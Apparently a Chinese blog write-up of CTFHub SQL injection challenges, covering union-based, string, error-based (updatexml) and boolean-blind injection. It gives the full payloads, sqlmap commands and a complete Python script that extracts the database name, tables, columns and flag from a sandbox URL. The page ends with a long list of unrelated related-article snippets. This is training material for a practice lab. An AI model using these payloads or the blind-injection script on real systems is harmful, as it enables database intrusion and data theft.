XXX_WXY
XXX_WXY

Ctfhub - web -- SQL注入(更新中)

SQL注入

  • 1.整型注入
  • 2.字符型注入
  • 3.报错注入
  • 4.布尔盲注
    • 方法一:sqlmap
    • 方法二:python脚本

1.整型注入

随便输入一个1,很明显这里已经给出了字段,不需要再order by了Ctfhub - web -- SQL注入(更新中)_第1张图片

1.数据库名和版本。这里发现是高版本,有information_schema
数据库

-1 union select version(),database()

Ctfhub - web -- SQL注入(更新中)_第2张图片
2.查表名

-1 union select 1, group_concat(table_name) from information_schema.tables where table_schema='sqli'

Ctfhub - web -- SQL注入(更新中)_第3张图片

3.查flag下的字段名

-1 union select 1, group_concat(column_name) from  information_schema.columns where table_schema='sqli' and table_name='flag'#

Ctfhub - web -- SQL注入(更新中)_第4张图片
4.直接拿数据

-1 union select 1, group_concat(flag) from flag

Ctfhub - web -- SQL注入(更新中)_第5张图片
over 提交即可

2.字符型注入

基本跟上面差不多
查表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

Ctfhub - web -- SQL注入(更新中)_第6张图片

查字段名

-1' union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag'#

Ctfhub - web -- SQL注入(更新中)_第7张图片

查数据

-1' union select 1,group_concat(flag) from sqli.flag#

Ctfhub - web -- SQL注入(更新中)_第8张图片
得到flag提交即可

3.报错注入

ps:报错注入涉及到几个函数,建议去查一下,这里我不做讲解
查数据库

-1 union select updatexml(1, concat(0x7e, database(),0x7e),1)

Ctfhub - web -- SQL注入(更新中)_第9张图片查表名

-1 union select updatexml(1, concat(0x7e,( select( group_concat( table_name))from information_schema.tables where table_schema="sqli"),0x7e),1)

Ctfhub - web -- SQL注入(更新中)_第10张图片

查字段

-1 union select updatexml(1, concat(0x7e,( select( group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)

Ctfhub - web -- SQL注入(更新中)_第11张图片

查数据

-1 union select updatexml(1, concat(0x7e,( select( group_concat(flag)) from sqli.flag),0x7e),1)

Ctfhub - web -- SQL注入(更新中)_第12张图片加上缺失的大括号提交即可

4.布尔盲注

注入点是id

方法一:sqlmap

python sqlmap.py -u url --current-db --level 5  #爆数据库名
python sqlmap.py -u url -D sqli --tables  #爆表
python sqlmap.py -u url -D sqli -T flag --dump level 5 #爆字段

数据库名字
Ctfhub - web -- SQL注入(更新中)_第13张图片爆表
Ctfhub - web -- SQL注入(更新中)_第14张图片
爆flag表下字段
Ctfhub - web -- SQL注入(更新中)_第15张图片

方法二:python脚本

如果不用sqlmap 这里加一个写好的脚本,可以直接跑。跑完大概两分钟吧。

# -*- coding = utf-8 -*-
# @Time : 2022/1/29 19:03
# @Author : WXY
# @File : mangzhu.py
# @SoftWare : PyCharm

import requests

urlOPEN = 'http://challenge-4304e13cfa256d00.sandbox.ctfhub.com:10800/?id='
starOperatorTime = []
mark = 'query_success'


def database_name():
    name = ''
    for j in range(1, 9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = urlOPEN + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
            j, i)
            # print(url+'%23')
            r = requests.get(url)
            if mark in r.text:
                name = name + i

                print(name)

                break
    print('database_name:', name)


database_name()


def table_name():
    list = []
    for k in range(0, 4):
        name = ''
        for j in range(1, 9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                k, j, i)
                # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        list.append(name)
    print('table_name:', list)


table_name()


def column_name():
    list = []
    for k in range(0, 3):  # 判断表里最多有4个字段
        name = ''
        for j in range(1, 9):  # 判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        list.append(name)
    print('column_name:', list)


column_name()


def get_data():
    name = ''
    for j in range(1, 50):  # 判断一个值最多有51个字符组成
        for i in range(48, 126):
            url = urlOPEN + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
            j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + chr(i)
                print(name)
                break
    print('value:', name)


get_data()

可以看到这里正在爆flag了,我懒得等,最后得到flag提交即可
Ctfhub - web -- SQL注入(更新中)_第16张图片

你可能感兴趣的:(信息安全,sql,数据库,web安全,信息安全,安全)

  • redis的内部编码和数据结构类型 Chsavvy redisredis数据结构nosql
    1.redis原理reids使用了单线程架构和I/O多路复用模型来实现性能的内存数据库服务2.简化的工作流程发送命令,执行命令,返回结果3.单线程处理但处理快速的原因纯内存访问非阻塞I/O,redis使用epoll作为I/O多路复用技术单线程避免了线程切换和竞态产生的消耗redis内部编码1)string内部编辑raw:大于的39个字节的字符串int:8个字节的长整型embstr:小于等于39个字
  • 林子雨《大数据技术原理与应用》第五讲——NoSQL数据库 天才代号23 大数据数据库hadoopnosql大数据
    林子雨《大数据技术原理与应用》第五讲——NoSQL数据库林子雨《大数据技术原理与应用》第五讲笔记NoSQL数据库特点灵活的可扩展性灵活的数据模型和云计算结合查询性能差未形成通用的行业标准维护更加复杂NoSQL数据库有四大类型键值数据库:redis列族数据库:HBase、Cassandra文档数据库:MongoDB图数据库:Neo4j键值数据库数据模型:键是一个字符串对象,值可以是任意类型的对象典型
  • Mybatis(Day 18) m0_73629914 数据库
    数据持久化是将内存中的数据模型转换为存储模型,以及将存储模型转换为内存中数据模型的统称。MyBatis支持定制化SQL、存储过程以及高级映射,可以在实体类和SQL语句之间建立映射关系,是一种半自动化的ORM实现。ORM(ObjectRelationalMapping,对象关系映射)是一种数据持久化技术,它在对象模型和关系型数据库之间建立起对应关系,并且提供了一种机制,通过JavaBean对象去操作
  • OLAP引擎比较 小手追梦 hadooprpcjava
    一,sparksql与dorisspark虽然是一个计算引擎,但sparksql也支持符合通用语法的sql查询,延迟为分钟级。doris是一个OLAP数据库,支持对大数据的复杂查询,延迟为秒级。doris比sparksql快,主要原因在于针对场景不同导致的架构不同。sparksql启动一个查询,需要进行资源调度、任务调度、任务分发,耗时更久。doris是常驻进程,启动一个doris查询后,快速的对
  • linux 开源oa系统,linux版64位免费OA办公系统4.17 大柚子蛇精病 linux开源oa系统
    安装包为海钛瑞OA办公自动化系统Linux平台免费版,目前可以在centos7或以上版本安装。先安装好Firebird(可以这里下载http://www.hitai.com/oa/download/download31.html),记下数据库管理员(SYSDBA)密码,默认密码为masterkey,请修改。安装步骤如下:1.下载本安装包2.解压缩tar-xzvfgooffice64_4.17.ta
  • 开源 OA 办公系统 自不量力的A同学 人工智能
    目前尚未有关于勾股OA5.6.8新春版发布的相关确切信息,但勾股OAv5.6已于2025年1月19日发布2。勾股OA是一款基于ThinkPHP6+Layui+MySql打造的实用的开源的企业办公系统2。勾股OAv5.6的相关信息如下2:系统特点系统各功能模块一目了然,操作简单,拥有通用型的后台权限管理框架,可全覆盖跟踪员工的操作记录。集成了系统设置、人事管理、行政管理、消息管理、企业公告、知识库、
  • Debezium系列之:基于Debezium JDBC connector消费Topic数据到Mysql数据库 快乐骑行^_^ debeziumDebezium系列JDBCconnector消费Topic数据Mysql数据库
    Debezium系列之:基于DebeziumJDBCconnector消费Topic数据到Mysql数据库一、需求背景二、相关技术博客三、创建表四、使用Debezium2.Xmysqlconnector采集数据五、数据库插入数据和查看Topic数据六、DebeziumJDBCconnector完整配置七、DebeziumJDBCconnector参数详解八、源库插入数据,查看debeziumjdb
  • Debezium系列之:debezium把sqlserver数据库多张表的数据发送到一个kafka topic 快乐骑行^_^ debeziumDebeziumsqlserver数据库kafkatopic
    Debezium系列之:debezium把sqlserver数据库多张表的数据发送到一个kafkatopic一、需求二、debezium实现sqlservercdc三、相关参数详解四、完整参数一、需求把一个sqlserver数据库多张表的数据全部发送到kafka集群的一个topic二、debezium实现sqlservercdc相关技术实现参考博主以下几篇博客:Debezium系列之:安装部署de
  • MySQL 常用命令 云水一方 数据库mysql大数据
    MySQL是一种流行的关系型数据库管理系统,其高效的性能和丰富的功能使其成为众多开发者的首选。在日常操作中,掌握MySQL的常用命令至关重要。以下是一些MySQL常用命令及其解释。️数据库操作命令1.登录数据库mysql-u[username]-p-u指定用户名。-p提示输入密码。2.显示所有数据库SHOWDATABASES;查看当前MySQL实例中的所有数据库。3.✨创建数据库CREATEDAT
  • Linux 上 MySQL 8.0 的备份与恢复实战指南 云水一方 mysqllinux大数据数据仓库运维数据库
    在数据库运维过程中,备份与恢复是保障数据安全的重要手段。MySQL8.0在Linux环境中提供了多种备份和恢复方案,包括逻辑备份和物理备份。本文将介绍这些备份方式的操作步骤与逻辑实现,帮助您高效管理数据库。一、备份与恢复的作用和意义数据安全:防止因误操作、硬件故障或恶意攻击导致的数据丢失。容灾恢复:在灾难发生后快速恢复业务功能,减少停机时间。数据迁移:支持数据库迁移至新环境或硬件。二、备份方式概览
  • java 字节文件类型_Java根据字节数据判断文件类型 weixin_39795284 java字节文件类型
    通常,在WEB系统中,上传文件时都需要做文件的类型校验,大致有如下几种方法:1.通过后缀名,如exe,jpg,bmp,rar,zip等等。2.通过读取文件,获取文件的Content-type来判断。3.通过读取文件流,根据文件流中特定的一些字节标识来区分不同类型的文件。4.若是图片,则通过缩放来判断,可以缩放的为图片,不可以的则不是。然而,在安全性较高的业务场景中,1,2两种方法的校验会被轻易绕过
  • 基于Tomcat构建LNMT架构的网站并实现Session保持 weixin_33795833 后端java前端ViewUI
    基于Tomcat构建LNMT架构的网站并实现Session保持-小小忍者-51CTO技术博客简介LNMT=Linux+Nginx+MySQL+Tomcat;Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器;在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP程序的首选;架构需求Tomcat实现JSP动态请求解析的基本架构说明:由后端Tomcat负
  • Debezium Configuration 设计文档 DataLu Debezium设计Debezium数据库debezium数据变更数据迁移
    DebeziumConfiguration设计文档1.核心设计理念1.1不可变配置配置对象一旦创建就不能修改所有修改操作都会返回新的配置对象通过不可变性保证线程安全使用@Immutable注解标记1.2组件化设计Configuration接口:定义配置的核心APIField类:描述配置字段的元数据和验证规则CommonConnectorConfig:所有连接器共享的基础配置EmbeddedConf
  • 大数据组件ClickHouse介绍(场景、优劣势、性能) 坚持是一种态度 大数据开发ClickHouse大数据clickhouse数据库列式数据库
    大数据组件ClickHouse介绍简介使用场景优势与劣势优势劣势性能单个查询吞吐量处理短查询的延时时间处理大量短查询数据写入性能查询性能简介clickhouse是一个高性能的列式存储分析数据库管理系统,由俄罗斯搜索引擎公司yandex开发。clickhouse具有以下特点高性能:clickhouse优化了查询和数据压缩算法,支持多维度数据分析和快速聚合查询。分布式:clickhouse采用共享无状
  • MySql-MySqlConnector DataLu MySql-debeziummysql数据库数据库开发大数据开源java
    提示:MySqlConnector类的主要职责是从MySQL数据库中捕获数据变更,并将这些变更以事件的形式发布到Kafka中。这使得下游的应用程序可以通过订阅Kafka主题来实时获取MySQL数据库中的变更信息。文章目录前言一、核心功能二、代码分析总结前言提示:MySqlConnector类是一个关键组件,它负责设置和管理整个数据捕获流程,从配置到数据库连接,再到数据变更事件的捕获和发送。这对于实
  • DB2-Db2StreamingChangeEventSource DataLu DB2-debezium数据库数据库开发大数据开源
    提示:Db2StreamingChangeEventSource类主要用于从IBMDb2数据库中读取变更数据捕获(CDC,ChangeDataCapture)信息。CDC是一种技术,允许系统跟踪数据库表中数据的更改,这些更改可以是插入、更新或删除操作。在大数据和实时数据处理场景中,CDC可以用来同步数据到其他系统,比如数据仓库、数据湖或者流处理平台如ApacheKafka。文章目录前言一、核心功能
  • DB2-Db2Connection DataLu DB2-debezium数据库大数据数据库开发开源
    提示:Db2Connection主要负责与DB2数据库的交互,特别针对CDC功能,提供了获取和处理数据库更改日志的能力,同时包含数据库连接管理、查询执行和结果处理的通用功能文章目录前言一、核心功能二、代码分析总结前言提示:Db2Connection类旨在简化与Db2数据库的交互,提供了一套全面的数据库操作接口,特别是针对需要利用Db2的变更数据捕获能力的场景。通过这个类,开发者可以更方便地执行数据
  • 深入探索数据库世界:SQLite、Redis、MySQL 与数据库设计范式 巴依老爷coder 数据库数据库sqliteredis网络安全mysqlsqldatabase
    数据库深入探索数据库世界:SQLite、Redis、MySQL与数据库设计范式一、SQLite数据库全方位解析(一)创建与基本操作(二)数据存储与表结构设计(三)数据操作:增删改查(四)与C语言联合使用(五)防止SQL注入二、Redis数据库深度剖析(一)数据存储类型与独特结构(二)数据持久化策略(三)卓越性能表现与应用场景三、MySQL数据库概览(一)创建数据库与表(二)数据操作与C语言交互四、
  • MySQL系列之(一)---MySQL使用方法总结(不断更新) Frodo先生 MySQL不断更新系列
    MySQL的使用方法总结在这里先标注上个人认为其他朋友总结的最好的MySQL的学习笔记:这个网站是一大佬博客,名字叫格物,特别值得学习,还有资料可以学习一千行MySQL学习笔记MySQL复习笔记(实例全)1.数据库的介绍数据库就是存储和管理数据的仓库,数据按照一定的格式进行存储,用户可以对数据库中的数据进行增加、修改、删除、查询等操作。2.数据库的分类关系型数据库非关系型数据库关系型数据库:是指采
  • 【redis】redis 查看连接数 九师兄 缓存-redisredis数据库java
    1.概述redis-cli连接服务器#无密码./redis-cli#有密码登录./redis-cli-a${pas}#切换数据库默认是0,不用切换select$database查看连接数允许最大连接数具体客户端连接最后的cmd是执行的命令类型
  • Redis 与 SQLite 的完美结合:深入探究 Redka 项目 youyouiknow tech-reviewredissqlite后端架构数据库缓存
    随着数据存储和访问需求的不断增长,不同类型的数据库在各自的领域中发挥着重要的作用。Redis以其高性能的内存数据库特性,广泛应用于需要快速响应的场景;SQLite则以其轻量级的嵌入式关系数据库,被广泛应用于移动设备和小型应用中。那么,如果将两者的优点结合起来,会产生怎样的火花呢?Redka就是这样一个旨在利用SQLite重新实现Redis优秀部分的项目,同时保持与RedisAPI的兼容性。一、Re
  • 重新架构:从 Redis 到 SQLite 性能提升 极道Jdon javascriptreactjs
    在这篇博文中,他们用SQLite取代了Redis,而令人惊讶的是,SQLite的速度更快!有趣的是,Redis是在本地运行,而SQLite是将数据存储在磁盘上。因此,这是内存(Redis)与磁盘(SQLite)的较量,但Redis需要通过IPC进行通信。人们一直以为磁盘I/O比IPC慢,但显然这并不总是正确的!实际上,IPC也可能更慢!Redis自己也承认这点Wafris重新架构了它的系统,从Re
  • 从 UUID 到 UUIDv7:唯一标识符的演进 俞凡 DeepNoMind 后端
    本文主要介绍UUID从v1到v8的演进历程,特别详细解读了最新的UUIDv7和UUIDv8,介绍了UUID在分布式系统和数据库索引中的应用和优势。原文:FromUUIDtoUUIDv7andBeyond:TheEvolutionofUniqueIdentifiers0190dffef1ad726bd83fab761dd389c6你在数据库或系统中见过这样一串数字吗?它很可能就是UUID。这并不是一
  • mysql having用法介绍 xiaoweids 数据库mysqlmysql数据库
    having字句可以让我们筛选成组后的各种数据,where字句在聚合前先筛选记录,也就是说作用在groupby和having字句前,下面通过实例给大家介绍mysqlhaving用法,一起看看吧having的用法having字句可以让我们筛选成组后的各种数据,where字句在聚合前先筛选记录,也就是说作用在groupby和having字句前。而having子句在聚合后对组记录进行筛选。SQL实例:一
  • mysql脏读解决方案_MySQL数据库的核心知识点 杜绍斐 DUSHAOFEI mysql脏读解决方案
    今天,数据库的操作越来越成为整个应用的性能瓶颈了,这点对于Web应用尤其明显。关于数据库的性能,这并不只是DBA才需要担心的事,而这更是我们程序员需要去关注的事情。当我们去设计数据库表结构,对操作数据库时(尤其是查表时的SQL语句),我们都需要注意数据操作的性能。这里,我们不会讲过多的SQL语句的优化,而只是针对MySQL这一Web应用最多的数据库。希望下面的这些优化技巧对你有用。数据库的使用,是
  • MySQL实战教程:从小白到大神的进阶之路! 奔跑吧邓邓子 项目实战mysql数据库
    目录一、MySQL概述1、MySQL简介1.1MySQL的历史背景1.2MySQL的特点1.3MySQL的应用场景1.4MySQL的版本2、MySQL发展历程2.1MySQL的起源2.2MySQL的早期发展2.3MySQL的成熟与普及2.4MySQL的商业化与收购2.5MySQL的持续创新3、MySQL应用场景3.1Web应用程序3.2企业级应用3.3大数据分析3.4移动应用3.5云计算3.6物联
  • MySql having语句 嗜血人偶 sql数据库
    四.having子句1.语法:select查询内容from表名[where条件][groupby分组字段][having条件][orderby字段名asc|desc]selectfrom--->where过滤--->groupby--->having过滤--1.列如:每个部门不同岗位人数,且人数大于2selectcount(*)fromempwherecount(*)>2groupbydeptno
  • 2025年:网络安全犯罪活动发展新趋势 网安加社区 网络安全网络风险网络犯罪
    2024年,网络空间经历了一场前所未有的动荡,威胁行为者的活动频繁且多变,这一系列事件为2025年的网络安全形势蒙上了一层阴影,预示着挑战依旧严峻。为了深入了解并有效应对勒索软件及其他网络犯罪活动的新趋势,我们与业界领先的安全专家进行了交流探讨,以期帮助企业组织全面认知可能面临的风险,并据此制定出切实有效的防御策略。勒索软件生态系统的持续扩张勒索软件生态系统正以前所未有的速度发展,不断适应并规避防
  • 2025年企业网络安全:风险预测与应对策略 网安加社区 网络安全网络风险企业安全
    据预测,到2025年,网络犯罪可能给全球经济带来每年高达10.5万亿美元的损失。这一个惊人的数字,为各行各业敲响了警钟。随着网络威胁日益复杂多变,企业要保持领先地位,就必须时刻保持警惕,勇于创新,采取积极主动的防御策略。那么,2025年的企业网络安全领域将面临哪些挑战?企业又该如何做好准备?接下来,我们一同深入探讨企业网络安全的发展趋势与应对策略。2025年企业网络安全风险如今,企业的网络安全已不
  • MySQL-HAVING语句 Onecat_j MySQLmysql
    语法SELECTcolumn1,column2,...column_n,aggregate_function(expression)FROMtablesWHEREpredicatesGROUPBYcolumn1,column2,...column_nHAVINGcondition1...condition_n;用法where、聚合函数、having在from后面的执行顺序:where>聚合函数(s
  • 解读Servlet原理篇二---GenericServlet与HttpServlet 周凡杨 javaHttpServlet源理GenericService源码
    在上一篇《解读Servlet原理篇一》中提到,要实现javax.servlet.Servlet接口(即写自己的Servlet应用),你可以写一个继承自javax.servlet.GenericServletr的generic Servlet ,也可以写一个继承自java.servlet.http.HttpServlet的HTTP Servlet(这就是为什么我们自定义的Servlet通常是exte
  • MySQL性能优化 bijian1013 数据库mysql
            性能优化是通过某些有效的方法来提高MySQL的运行速度,减少占用的磁盘空间。性能优化包含很多方面,例如优化查询速度,优化更新速度和优化MySQL服务器等。本文介绍方法的主要有:         a.优化查询         b.优化数据库结构  
  • ThreadPool定时重试 dai_lm javaThreadPoolthreadtimertimertask
    项目需要当某事件触发时,执行http请求任务,失败时需要有重试机制,并根据失败次数的增加,重试间隔也相应增加,任务可能并发。 由于是耗时任务,首先考虑的就是用线程来实现,并且为了节约资源,因而选择线程池。 为了解决不定间隔的重试,选择Timer和TimerTask来完成 package threadpool; public class ThreadPoolTest {
  • Oracle 查看数据库的连接情况 周凡杨 sqloracle 连接
    首先要说的是,不同版本数据库提供的系统表会有不同,你可以根据数据字典查看该版本数据库所提供的表。 select * from dict where table_name like '%SESSION%'; 就可以查出一些表,然后根据这些表就可以获得会话信息 select sid,serial#,status,username,schemaname,osuser,terminal,ma
  • 类的继承 朱辉辉33 java
    类的继承可以提高代码的重用行,减少冗余代码;还能提高代码的扩展性。Java继承的关键字是extends 格式:public class 类名(子类)extends 类名(父类){ } 子类可以继承到父类所有的属性和普通方法,但不能继承构造方法。且子类可以直接使用父类的public和 protected属性,但要使用private属性仍需通过调用。 子类的方法可以重写,但必须和父类的返回值类
  • android 悬浮窗特效 肆无忌惮_ android
    最近在开发项目的时候需要做一个悬浮层的动画,类似于支付宝掉钱动画。但是区别在于,需求是浮出一个窗口,之后边缩放边位移至屏幕右下角标签处。效果图如下:   一开始考虑用自定义View来做。后来发现开线程让其移动很卡,ListView+动画也没法精确定位到目标点。   后来想利用Dialog的dismiss动画来完成。   自定义一个Dialog后,在styl
  • hadoop伪分布式搭建 林鹤霄 hadoop
    要修改4个文件    1: vim hadoop-env.sh  第九行    2: vim core-site.xml            <configuration>     &n
  • gdb调试命令 aigo gdb
    原文:http://blog.csdn.net/hanchaoman/article/details/5517362   一、GDB常用命令简介   r run 运行.程序还没有运行前使用 c             cuntinue 
  • Socket编程的HelloWorld实例 alleni123 socket
    public class Client { public static void main(String[] args) { Client c=new Client(); c.receiveMessage(); } public void receiveMessage(){ Socket s=null; BufferedRea
  • 线程同步和异步 百合不是茶 线程同步异步
    多线程和同步 : 如进程、线程同步,可理解为进程或线程A和B一块配合,A执行到一定程度时要依靠B的某个结果,于是停下来,示意B运行;B依言执行,再将结果给A;A再继续操作。 所谓同步,就是在发出一个功能调用时,在没有得到结果之前,该调用就不返回,同时其它线程也不能调用这个方法   多线程和异步:多线程可以做不同的事情,涉及到线程通知     &
  • JSP中文乱码分析 bijian1013 javajsp中文乱码
            在JSP的开发过程中,经常出现中文乱码的问题。         首先了解一下Java中文问题的由来:         Java的内核和class文件是基于unicode的,这使Java程序具有良好的跨平台性,但也带来了一些中文乱码问题的麻烦。原因主要有两方面,
  • js实现页面跳转重定向的几种方式 bijian1013 JavaScript重定向
            js实现页面跳转重定向有如下几种方式: 一.window.location.href <script language="javascript"type="text/javascript"> window.location.href="http://www.baidu.c
  • 【Struts2三】Struts2 Action转发类型 bit1129 struts2
     在【Struts2一】 Struts Hello World http://bit1129.iteye.com/blog/2109365中配置了一个简单的Action,配置如下   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configurat
  • 【HBase十一】Java API操作HBase bit1129 hbase
    Admin类的主要方法注释:   1. 创建表 /** * Creates a new table. Synchronous operation. * * @param desc table descriptor for table * @throws IllegalArgumentException if the table name is res
  • nginx gzip ronin47 nginx gzip
    Nginx GZip 压缩 Nginx GZip 模块文档详见:http://wiki.nginx.org/HttpGzipModule 常用配置片段如下: gzip on; gzip_comp_level 2; # 压缩比例,比例越大,压缩时间越长。默认是1 gzip_types text/css text/javascript; # 哪些文件可以被压缩 gzip_disable &q
  • java-7.微软亚院之编程判断俩个链表是否相交 给出俩个单向链表的头指针,比如 h1 , h2 ,判断这俩个链表是否相交 bylijinnan java
    public class LinkListTest { /** * we deal with two main missions: * * A. * 1.we create two joined-List(both have no loop) * 2.whether list1 and list2 join * 3.print the join
  • Spring源码学习-JdbcTemplate batchUpdate批量操作 bylijinnan javaspring
    Spring JdbcTemplate的batch操作最后还是利用了JDBC提供的方法,Spring只是做了一下改造和封装 JDBC的batch操作: String sql = "INSERT INTO CUSTOMER " + "(CUST_ID, NAME, AGE) VALUES (?, ?, ?)";
  • [JWFD开源工作流]大规模拓扑矩阵存储结构最新进展 comsci 工作流
        生成和创建类已经完成,构造一个100万个元素的矩阵模型,存储空间只有11M大,请大家参考我在博客园上面的文档"构造下一代工作流存储结构的尝试",更加相信的设计和代码将陆续推出.........     竞争对手的能力也很强.......,我相信..你们一定能够先于我们推出大规模拓扑扫描和分析系统的....
  • base64编码和url编码 cuityang base64url
    import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.PrintWriter; import java.io.StringWriter; import java.io.UnsupportedEncodingException;
  • web应用集群Session保持 dalan_123 session
    关于使用 memcached 或redis 存储 session ,以及使用 terracotta 服务器共享。建议使用 redis,不仅仅因为它可以将缓存的内容持久化,还因为它支持的单个对象比较大,而且数据类型丰富,不只是缓存 session,还可以做其他用途,一举几得啊。1、使用 filter 方法存储这种方法比较推荐,因为它的服务器使用范围比较多,不仅限于tomcat ,而且实现的原理比较简
  • Yii 框架里数据库操作详解-[增加、查询、更新、删除的方法 'AR模式'] dcj3sjt126com 数据库
        public function getMinLimit () {        $sql = "...";        $result = yii::app()->db->createCo
  • solr StatsComponent(聚合统计) eksliang solr聚合查询solr stats
    StatsComponent 转载请出自出处:http://eksliang.iteye.com/blog/2169134 http://eksliang.iteye.com/ 一、概述        Solr可以利用StatsComponent 实现数据库的聚合统计查询,也就是min、max、avg、count、sum的功能   二、参数
  • 百度一道面试题 greemranqq 位运算百度面试寻找奇数算法bitmap 算法
    那天看朋友提了一个百度面试的题目:怎么找出{1,1,2,3,3,4,4,4,5,5,5,5}  找出出现次数为奇数的数字.   我这里复制的是原话,当然顺序是不一定的,很多拿到题目第一反应就是用map,当然可以解决,但是效率不高。   还有人觉得应该用算法xxx,我是没想到用啥算法好...!   还有觉得应该先排序...   还有觉
  • Spring之在开发中使用SpringJDBC ihuning spring
      在实际开发中使用SpringJDBC有两种方式:   1. 在Dao中添加属性JdbcTemplate并用Spring注入;     JdbcTemplate类被设计成为线程安全的,所以可以在IOC 容器中声明它的单个实例,并将这个实例注入到所有的 DAO 实例中。JdbcTemplate也利用了Java 1.5 的特定(自动装箱,泛型,可变长度
  • JSON API 1.0 核心开发者自述 | 你所不知道的那些技术细节 justjavac json
    2013年5月,Yehuda Katz 完成了JSON API(英文,中文) 技术规范的初稿。事情就发生在 RailsConf 之后,在那次会议上他和 Steve Klabnik 就 JSON 雏形的技术细节相聊甚欢。在沟通单一 Rails 服务器库—— ActiveModel::Serializers 和单一 JavaScript 客户端库——&
  • 网站项目建设流程概述 macroli 工作
    一.概念 网站项目管理就是根据特定的规范、在预算范围内、按时完成的网站开发任务。 二.需求分析 项目立项   我们接到客户的业务咨询,经过双方不断的接洽和了解,并通过基本的可行性讨论够,初步达成制作协议,这时就需要将项目立项。较好的做法是成立一个专门的项目小组,小组成员包括:项目经理,网页设计,程序员,测试员,编辑/文档等必须人员。项目实行项目经理制。 客户的需求说明书   第一步是需
  • AngularJs 三目运算 表达式判断 qiaolevip 每天进步一点点学习永无止境众观千象AngularJS
    事件回顾:由于需要修改同一个模板,里面包含2个不同的内容,第一个里面使用的时间差和第二个里面名称不一样,其他过滤器,内容都大同小异。希望杜绝If这样比较傻的来判断if-show or not,继续追究其源码。 var b = "{{", a = "}}"; this.startSymbol = function(a) {
  • Spark算子:统计RDD分区中的元素及数量 superlxw1234 sparkspark算子Spark RDD分区元素
    关键字:Spark算子、Spark RDD分区、Spark RDD分区元素数量     Spark RDD是被分区的,在生成RDD时候,一般可以指定分区的数量,如果不指定分区数量,当RDD从集合创建时候,则默认为该程序所分配到的资源的CPU核数,如果是从HDFS文件创建,默认为文件的Block数。   可以利用RDD的mapPartitionsWithInd
  • Spring 3.2.x将于2016年12月31日停止支持 wiselyman Spring 3
                  Spring 团队公布在2016年12月31日停止对Spring Framework 3.2.x(包含tomcat 6.x)的支持。在此之前spring团队将持续发布3.2.x的维护版本。          请大家及时准备及时升级到Spring
  • fis纯前端解决方案fis-pure zccst JavaScript
    作者:zccst FIS通过插件扩展可以完美的支持模块化的前端开发方案,我们通过FIS的二次封装能力,封装了一个功能完备的纯前端模块化方案pure。 1,fis-pure的安装 $ fis install -g fis-pure $ pure -v 0.1.4 2,下载demo到本地 git clone https://github.com/hefangshi/f
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他